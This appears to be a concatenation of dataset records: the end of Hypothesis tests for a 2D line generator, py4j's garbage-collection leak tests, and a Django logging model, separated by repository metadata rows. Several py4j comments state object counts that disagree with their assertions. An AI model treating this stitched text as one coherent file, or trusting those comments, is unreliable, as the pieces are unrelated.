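# gives (0, 0), (1, 0), (2, 1), (3, 1), (4, 2) -- the same sequence
# asserted explicitly in test_simple_line_examples below.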
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=-100),
st.integers(min_value=-100, max_value=100),
)
def test_lines_towards_west(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (y1 - y0) / abs(x1 - x0)
y_new = y0
for x in range(x0, x1 - 1, -1):
correct_result.append((x, math.floor(y_new)))
y_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-100, max_value=100),
st.integers(min_value=101, max_value=10 ** 5),
)
def test_lines_towards_north(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (x1 - x0) / abs(y1 - y0)
x_new = x0
for y in range(y0, y1 + 1):
correct_result.append((math.floor(x_new), y))
x_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-100, max_value=100),
st.integers(min_value=-10 ** 5, max_value=-101),
)
def test_lines_towards_south(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (x1 - x0) / abs(y1 - y0)
x_new = x0
for y in range(y0, y1 - 1, -1):
correct_result.append((math.floor(x_new), y))
x_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
def test_simple_line_examples():
# No line: start and end point are identical; don't divide by zero
a = list(generate_2d_line(0, 0, 0, 0))
assert a == [(0, 0)]
# 2 examples to check vertical and horizontal
a = list(generate_2d_line(0, 0, 1, 0))
assert a == [(0, 0), (1, 0)]
a = list(generate_2d_line(0, 0, 0, 1))
assert a == [(0, 0), (0, 1)]
# 3 examples to check diagonal
a = list(generate_2d_line(0, 0, 1, 1))
assert a == [(0, 0), (1, 1)]
a = list(generate_2d_line(-1, -1, 1, 1))
assert a == [(-1, -1), (0, 0), (1, 1)]
a = list(generate_2d_line(-1, 1, 1, -1))
assert a == [(-1, 1), (0, 0), (1, -1)]
# Point2 is mostly to the right of point1
a = list(generate_2d_line(0, 0, 4, 2))
b = [(0, 0), (1, 0), (2, 1), (3, 1), (4, 2)]
assert a == b, f"{a}\n{b}"
# Point2 is mostly to the left of point1
a = list(generate_2d_line(4, 2, 0, 0))
b = [(4, 2), (3, 1), (2, 1), (1, 0), (0, 0)]
assert a == b, f"{a}\n{b}"
# Point2 is mostly to the top of point1
a = list(generate_2d_line(0, 0, 2, 4))
b = [(0, 0), (0, 1), (1, 2), (1, 3), (2, 4)]
assert a == b, f"{a}\n{b}"
# Point2 is mostly to the bottom of point1
a = list(generate_2d_line(2, 4, 0, 0))
b = [(2, 4), (1, 3), (1, 2), (0, 1), (0, 0)]
assert a == b, f"{a}\n{b}"
| 29.609023 | 69 | 0.584053 | 682 | 3,938 | 3.205279 | 0.133431 | 0.021958 | 0.073193 | 0.131747 | 0.801006 | 0.774016 | 0.774016 | 0.747941 | 0.702653 | 0.668801 | 0 | 0.100633 | 0.237938 | 3,938 | 132 | 70 | 29.833333 | 0.627791 | 0.074657 | 0 | 0.553191 | 1 | 0 | 0.009351 | 0 | 0 | 0 | 0 | 0 | 0.148936 | 1 | 0.053191 | false | 0 | 0.042553 | 0 | 0.095745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
672ce002de690c0f9465a092c53d7a026be83156 | 31,029 | py | Python | py4j-python/src/py4j/tests/memory_leak_test.py | dHannasch/py4j | 21f17f9e723729433f5f1abcf79482c1efb2ff89 | ["BSD-3-Clause"] | 3,301 | 2018-10-01T16:30:44.000Z | 2022-03-30T08:07:16.000Z |
py4j-python/src/py4j/tests/memory_leak_test.py | dHannasch/py4j | 21f17f9e723729433f5f1abcf79482c1efb2ff89 | ["BSD-3-Clause"] | 308 | 2015-01-08T00:29:52.000Z | 2022-02-16T02:31:17.000Z |
py4j-python/src/py4j/tests/memory_leak_test.py | dHannasch/py4j | 21f17f9e723729433f5f1abcf79482c1efb2ff89 | ["BSD-3-Clause"] | 765 | 2018-10-09T02:02:19.000Z | 2022-03-31T12:06:21.000Z |
# -*- coding: UTF-8 -*-
from contextlib import contextmanager
import gc
from multiprocessing import Process
import subprocess
import unittest
from py4j.java_gateway import (
JavaGateway, GatewayParameters, CallbackServerParameters,
DEFAULT_PORT, DEFAULT_PYTHON_PROXY_PORT)
from py4j.clientserver import (
ClientServer, JavaParameters, PythonParameters)
from py4j.tests.java_gateway_test import (
PY4J_JAVA_PATH, check_connection, sleep)
from py4j.tests.py4j_callback_recursive_example import HelloState
from py4j.tests.instrumented import (
InstrJavaGateway, InstrumentedPythonPing, register_creation,
CREATED, FINALIZED, MEMORY_HOOKS, InstrClientServer)
def start_instrumented_gateway_server():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.instrumented.InstrumentedApplication"])
def start_instrumented_clientserver():
subprocess.call([
"java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
"py4j.instrumented.InstrumentedClientServerApplication"])
def start_gateway_server_example_app_process(start_gateway_server=True):
# XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
if start_gateway_server:
p = Process(target=start_instrumented_gateway_server)
else:
p = Process(target=start_instrumented_clientserver)
p.start()
sleep()
check_connection()
return p
@contextmanager
def gateway_server_example_app_process(start_gateway_server=True):
p = start_gateway_server_example_app_process(start_gateway_server)
try:
yield p
finally:
p.join()
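# Typical use of the context manager above (a sketch; the concrete
# assertions live in the test classes below):
#
#     with gateway_server_example_app_process():
#         gateway = JavaGateway()
#         ...  # exercise the instrumented JVM, then gateway.shutdown()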
class HelloState2(HelloState):
def __init__(self, run_gc=True):
self.gateway = None
self.run_gc = run_gc
super(HelloState2, self).__init__()
register_creation(self)
def _play_with_jvm(self):
al = self.gateway.jvm.java.util.ArrayList()
al.append("Hello World")
obj = self.gateway.jvm.py4j.\
instrumented.InstrumentedObject("test")
al.append(obj)
return str(al)
def sayHello(self, int_value=None, string_value=None):
self._play_with_jvm()
if self.run_gc:
python_gc()
return super(HelloState2, self).sayHello(
int_value, string_value)
class Java:
implements = ["py4j.examples.IHello"]
def assert_python_memory(test, size):
test.assertEqual(size, len(CREATED))
test.assertEqual(size, len(FINALIZED))
test.assertEqual(set(CREATED), set(FINALIZED))
def python_gc():
"""Runs the gc three times to ensure that all circular reference are
correctly removed.
"""
for i in range(3):
gc.collect()
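# One gc.collect() pass is not always enough: breaking a cycle can make
# the objects it referenced collectable only on a later pass, so the
# loop above runs the collector several times to drain such chains.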
class GatewayServerTest(unittest.TestCase):
def tearDown(self):
MEMORY_HOOKS.clear()
CREATED.clear()
FINALIZED.clear()
def testPythonToJava(self):
def work_with_object(gateway):
obj = gateway.jvm.py4j.\
instrumented.InstrumentedObject("test")
return str(obj)
def internal_work():
gateway2 = InstrJavaGateway(gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5))
sleep()
work_with_object(gateway2)
python_gc()
sleep()
gateway2.shutdown()
with gateway_server_example_app_process():
gateway = JavaGateway()
gateway.entry_point.startServer2()
internal_work()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 4 objects: GatewayServer, GatewayConnection, CallbackClient,
# InstrumentedObject
self.assertEqual(4, len(createdSet))
self.assertEqual(4, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 4 objects: JavaGateway, GatewayClient, GatewayProperty,
# GatewayConnection
assert_python_memory(self, 4)
def testPythonToJavaToPython(self):
def play_with_ping(gateway):
ping = InstrumentedPythonPing()
pingpong = gateway.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work():
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(gateway2)
python_gc()
sleep()
gateway2.shutdown()
with gateway_server_example_app_process():
gateway = JavaGateway()
gateway.entry_point.startServer2()
internal_work()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 9 objects: GatewayServer, 4 GatewayConnection, CallbackClient,
# 3 CallbackConnection
self.assertEqual(9, len(createdSet))
self.assertEqual(9, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 12 objects: JavaGateway, CallbackServer, GatewayClient,
# GatewayProperty, PythonPing, 4 GatewayConnection,
# 3 CallbackConnection. Notice the symmetry between callback
# and gateway connections.
assert_python_memory(self, 12)
def testPythonToJavaToPythonClose(self):
def play_with_ping(gateway):
ping = InstrumentedPythonPing()
pingpong = gateway.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work(assert_memory):
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(gateway2)
python_gc()
sleep()
gateway2.close(close_callback_server_connections=True,
keep_callback_server=True)
sleep()
assert_memory()
gateway2.shutdown()
sleep()
with gateway_server_example_app_process():
gateway = JavaGateway()
gateway.entry_point.startServer2()
def perform_memory_tests():
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 10 objects: GatewayServer, 4 GatewayConnection,
# CallbackClient, 4 CallbackConnection
self.assertEqual(10, len(createdSet))
# 13 objects: JavaGateway, CallbackServer, GatewayClient,
# GatewayProperty, PythonPing, 4 GatewayConnection,
# 4 CallbackConnection. Notice the symmetry between callback
# and gateway connections.
self.assertEqual(13, len(CREATED))
# 4 gateway connections, 3 callback connections.
# There is still one callback connection staying around
# following Java finalization that called back Python.
self.assertEqual(7, len(finalizedSet))
# Same amount of connections for the Python side
self.assertEqual(7, len(FINALIZED))
internal_work(perform_memory_tests)
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
gateway.shutdown()
# 14 objects: JavaGateway, CallbackServer, GatewayClient,
# GatewayProperty, PythonPing, 5 GatewayConnection,
# 4 CallbackConnection. Notice the symmetry between callback
# and gateway connections.
# One more gateway connection created because we called shutdown
# after close (which requires a connection to send a shutdown
# command).
assert_python_memory(self, 14)
def testJavaToPythonToJavaCleanGC(self):
def internal_work(gateway):
hello_state = HelloState2()
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(True)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
internal_work(gateway)
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGC(self):
def internal_work(gateway):
hello_state = HelloState2(run_gc=False)
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(True)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
# We disable gc to test whether a shutdown on one side will
# garbage collect everything.
gc.disable()
internal_work(gateway)
gc.enable()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
def testJavaToPythonToJavaCleanGCNoShutdown(self):
def internal_work(gateway):
hello_state = HelloState2()
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(False)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
internal_work(gateway)
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGCNoShutdown(self):
def internal_work(gateway):
hello_state = HelloState2(run_gc=False)
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(False)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
# We disable gc to test whether a shutdown on one side will
# garbage collect everything.
gc.disable()
internal_work(gateway)
gc.enable()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
class ClientServerTest(unittest.TestCase):
def tearDown(self):
MEMORY_HOOKS.clear()
CREATED.clear()
FINALIZED.clear()
def testPythonToJava(self):
def work_with_object(clientserver):
obj = clientserver.jvm.py4j.\
instrumented.InstrumentedObject("test")
return str(obj)
def internal_work():
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
work_with_object(clientserver2)
python_gc()
sleep()
clientserver2.shutdown()
with gateway_server_example_app_process(False):
clientserver = ClientServer()
clientserver.entry_point.startServer2()
internal_work()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 5 objects: ClientServer, ClientServerConnection, PythonClient,
# JavaServer, InstrumentedObject
self.assertEqual(5, len(createdSet))
self.assertEqual(5, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 5 objects: ClientServer, ClientServerConnection, PythonClient,
# JavaServer, GatewayProperty
assert_python_memory(self, 5)
def testPythonToJavaToPython(self):
def play_with_ping(clientserver):
ping = InstrumentedPythonPing()
pingpong = clientserver.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work():
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(clientserver2)
python_gc()
sleep()
clientserver2.shutdown()
with gateway_server_example_app_process(False):
clientserver = ClientServer()
clientserver.entry_point.startServer2()
internal_work()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 4 objects: ClientServer, ClientServerConnection, JavaServer,
# PythonClient
self.assertEqual(4, len(createdSet))
self.assertEqual(4, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 6 objects: ClientServer, PythonServer, JavaClient,
# GatewayProperty, PythonPing, ClientServerConnection
assert_python_memory(self, 6)
def testPythonToJavaToPythonClose(self):
def play_with_ping(clientserver):
ping = InstrumentedPythonPing()
pingpong = clientserver.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work(assert_memory):
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(clientserver2)
python_gc()
sleep()
clientserver2.close(
close_callback_server_connections=True,
keep_callback_server=True)
sleep()
assert_memory()
clientserver2.shutdown()
sleep()
with gateway_server_example_app_process(False):
clientserver = ClientServer()
clientserver.entry_point.startServer2()
def perform_memory_tests():
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.\
MetricRegistry.getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.\
MetricRegistry.getFinalizedObjectsKeySet()
# 6 objects: ClientServer, JavaServer,
# PythonClient, 3 ClientServerConnection.
self.assertEqual(6, len(createdSet))
# Should be 2: ClientServer, 1 ClientServerConnection.
# But for some reason, Java refuses to collect the
# ClientServerConnection even though there are no strong
# references.
self.assertEqual(1, len(finalizedSet))
# 8 objects: ClientServer, PythonServer, JavaClient,
# GatewayProperty, PythonPing, 3 ClientServerConnection
self.assertEqual(8, len(CREATED))
# PythonPing + ClientServerConnection
self.assertEqual(2, len(FINALIZED))
internal_work(perform_memory_tests)
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
clientserver.shutdown()
# 9 objects: ClientServer, PythonServer, JavaClient,
# GatewayProperty, PythonPing, 4 ClientServerConnection
assert_python_memory(self, 9)
def testJavaToPythonToJavaCleanGC(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(True)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
internal_work(clientserver)
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 7 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 2
# ClientServerConnection (1 to call sayHello)
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (1)
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGC(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(True)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
# We disable gc to test whether a shutdown on one side will
# garbage collect everything.
gc.disable()
internal_work(clientserver)
gc.enable()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 7 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 2
# ClientServerConnection (1 to call sayHello)
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (2)
assert_python_memory(self, 7)
def testJavaToPythonToJavaCleanGCNoShutdown(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(False)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
internal_work(clientserver)
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 8 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 3
# ClientServerConnection (1 to call sayHello,
# 1 that receives shutdown command)
self.assertEqual(7, len(createdSet))
self.assertEqual(7, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (2)
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGCNoShutdown(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(False)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
# We disable gc to test whether a shutdown on one side will
# garbage collect everything.
gc.disable()
internal_work(clientserver)
gc.enable()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 7 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 3
# ClientServerConnection (1 to call sayHello,
# 1 that receives shutdown command)
self.assertEqual(7, len(createdSet))
self.assertEqual(7, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (2)
assert_python_memory(self, 7)
| 40.507833 | 78 | 0.618099 | 2,649 | 31,029 | 7.081918 | 0.090223 | 0.054371 | 0.047601 | 0.077399 | 0.848827 | 0.835394 | 0.801493 | 0.793923 | 0.773987 | 0.762473 | 0 | 0.016005 | 0.305295 | 31,029 | 765 | 79 | 40.560784 | 0.854287 | 0.16549 | 0 | 0.829091 | 0 | 0 | 0.009895 | 0.003648 | 0 | 0 | 0 | 0 | 0.161818 | 1 | 0.085455 | false | 0 | 0.018182 | 0 | 0.127273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
674cd9effe46aa856791aad5cfee5cbd9ff2ea52 | 6,639 | py | Python | aimsweb/aims/models.py | DNATUNA/ELKDjangoWork | 8c1b20e802a16d3d7922d1e20c80a900c23ffad1 | ["MIT"] | null | null | null |
aimsweb/aims/models.py | DNATUNA/ELKDjangoWork | 8c1b20e802a16d3d7922d1e20c80a900c23ffad1 | ["MIT"] | 3 | 2019-11-23T05:08:18.000Z | 2021-06-10T21:06:51.000Z |
aimsweb/aims/models.py | DNATUNA/ELKDjangoWork | 8c1b20e802a16d3d7922d1e20c80a900c23ffad1 | ["MIT"] | null | null | null |
from django.db import models
from django.utils import timezone
from django.urls import reverse
# Create your models here.
class LogInfo(models.Model):
aims_id = models.CharField(max_length=100)
host_id = models.CharField(max_length=100)
app_id = models.CharField(max_length=100)
app_name = models.CharField(max_length=100)
system_status = models.CharField(max_length=100)
log_agent_name = models.CharField(max_length=100)
description = models.TextField(blank=True, null=True)
use_yn = models.TextField(blank=True, default="Y", max_length=1)
prediction_qual = models.CharField(blank=True, null=True, max_length=100)
prediction_model = models.CharField(blank=True, null=True, max_length=100)
prediction_model_version = models.CharField(blank=True, null=True, max_length=100)
ptn001_cnt = models.CharField(blank=True, null=True, max_length=100)
ptn001_ratio = models.CharField(blank=True, null=True, max_length=100)
ptn002_cnt = models.CharField(blank=True, null=True, max_length=100)
ptn002_ratio = models.CharField(blank=True, null=True, max_length=100)
ptn003_cnt = models.CharField(blank=True, null=True, max_length=100)
ptn003_ratio = models.CharField(blank=True, null=True, max_length=100)
ptn004_cnt = models.CharField(blank=True, null=True, max_length=100)
created_date = models.DateTimeField(default=timezone.now)
published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.aims_id
def get_absolute_url(self):
return reverse("loginfo:detail", kwargs={"aims_id": self.aims_id})
